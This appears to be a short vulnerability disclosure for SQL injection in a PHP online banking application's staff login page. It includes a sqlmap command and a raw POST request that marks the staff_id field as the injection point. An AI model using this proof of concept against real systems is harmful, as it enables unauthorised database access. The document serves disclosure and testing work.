Online Banking System SQL Injection
Description=> sql injection atstaff_login.php
Step to Reproduct
Staff Login->Staff ID->Staff Password->Login->modify data->Sqlmap
Exploit
- Input
Staff IDandStaff Password->Login
- Use Burp Suite capture request

- Then modify the data and save as
sqli.txt
- Scan
sqli.txtonSqlmap
python3 sqlmap.py -r sqli.txt --batch --current-userVulnerable Code
- No filter
Staff IDandStaff Passwordwhen inserting data to database
Information Disclosure
POC
Injection Point
staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGINRequest
POST /Online-Banking/staff_login.php HTTP/1.1
Host: 192.168.1.101:8080
Content-Length: 57
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.1.101:8080
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.1.101:8080/Online-Banking/staff_login.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=jpkpok9b1tiholm7srir1b6mev
Connection: close
staff_id=*&password=hhhhhhhhhh&staff_login-btn=LOGIN

